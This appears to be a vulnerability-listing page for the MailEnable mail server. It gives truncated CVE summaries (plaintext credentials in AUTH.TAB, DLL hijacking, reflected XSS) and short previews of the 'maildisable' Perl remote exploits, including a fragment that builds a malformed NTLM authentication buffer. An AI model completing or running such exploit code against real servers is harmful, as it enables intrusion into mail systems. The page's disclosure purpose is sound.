EUVD-2025-202481

MailEnable versions prior to 10.54 contain a cleartext storage of credentials vulnerability that can lead to local credential compromise and account takeover. The product stores user and administrative passwords in plaintext within AUTH.TAB with overly permissive filesystem access. A local...

CVE-2025-34427 MailEnable < 10.54 Cleartext Credential Storage in AUTH.TAB

MailEnable versions prior to 10.54 contain a cleartext storage of credentials vulnerability that can lead to local credential compromise and account takeover. The product stores user and administrative passwords in plaintext within AUTH.TAB with overly permissive filesystem access. A local...

CVE-2025-34418

MailEnable before version 10.54 is affected by an unsafe DLL loading vulnerability. The administrative executable loads MEAIMF.DLL from the installation directory without proper integrity validation or a secure search order. A local attacker with write access to that directory can place a malicio...

CVE-2025-34420 MailEnable < 10.54 DLL Hijacking via Unsafe Loading of MEAIAM.DLL

MailEnable versions prior to 10.54 contain an unsafe DLL loading vulnerability that can lead to local arbitrary code execution. The MailEnable administrative executable attempts to load MEAIAM.DLL from its installation directory without sufficient integrity validation or a secure search order. A...

CVE-2025-34398 MailEnable < 10.54 Reflected XSS in AddressesBcc Parameter of AddressBook.aspx

MailEnable versions prior to 10.54 contain a reflected cross-site scripting XSS vulnerability in the AddressesBcc parameter of /Mondo/lang/sys/Forms/AddressBook.aspx. The AddressesBcc value is not properly sanitized when processed via a GET request and is reflected within a block in the JavaScrip...

ME020567: MailEnable webmail cross-site scripting vulnerability CVE-2012-0389

ME020567: MailEnable webmail cross-site scripting vulnerability CWE-79 References: CVE-2012-0389 Discovered by: Sajjad Pourali, Narendra Shinde and Shahab NamaziKhah Vendor advisory: http://www.mailenable.com/kb/Content/Article.asp?ID=me020567 Vendor contact: 2012-01-04 09:49:36 UTC Vendor...

maildisable-v4.pl.txt

!/usr/bin/perl maildisable-v4.pl Mail Enable Professional/Enterprise v2.32-4 win32 remote exploit by mu-b - Wed Nov 29 2006 - Tested on: Mail Enable Professional v2.32 win32 - with HOTFIX Mail Enable Professional v2.33 win32 Mail Enable Professional v2.35 win32 Mail Enable Professional v2.37 win3...

maildisable-v6.pl.txt

!/usr/bin/perl maildisable-v6.pl Mail Enable Professional =v2.35 win32 remote exploit by mu-b - Tue Dec 5 2006 - Tested on: Mail Enable Professional v2.35 win32 Note: timing is quite critical with this!!, so change $senddelay if it doesn't work.... use Getopt::Std; getopts't:n:', %arg; use Socket...

maildisable-v3.pl.txt

!/usr/bin/perl maildisable-v3.pl Mail Enable Professional/Enterprise v2.32-4 win32 remote exploit by mu-b - Thu Nov 23 2006 - Tested on: Mail Enable Professional v2.32 win32 - with HOTFIX Mail Enable Professional v2.33 win32 Mail Enable Professional v2.34 win32 what does this remind you off? Note...

maildisable-v7.pl.txt

!/usr/bin/perl maildisable-v7.pl Mail Enable Professional/Enterprise v2.32-7 win32 by mu-b - Wed Feb 14 2007 - Tested on: Mail Enable Professional v2.37 win32 use Getopt::Std; getopts't:', %arg; use Socket; use MIME::Base64; my $target; if defined$arg't' $target = $arg't' if !defined$target my...

maildisable-v5.pl.txt

!/usr/bin/perl maildisable-v5.pl Mail Enable Professional/Enterprise Connected\n"; sendSOCKET, "1 AUTHENTICATE NTLM\r\n", 0; sleep$senddelay; $buf = $PAD x 12. "\xfa\xff\xff\xff". $PAD x 12; sendSOCKET, encodebase64$buf."\r\n", 0; sleep$senddelay; $buf = $PAD x 28. "\x00\x01". $PAD x 2...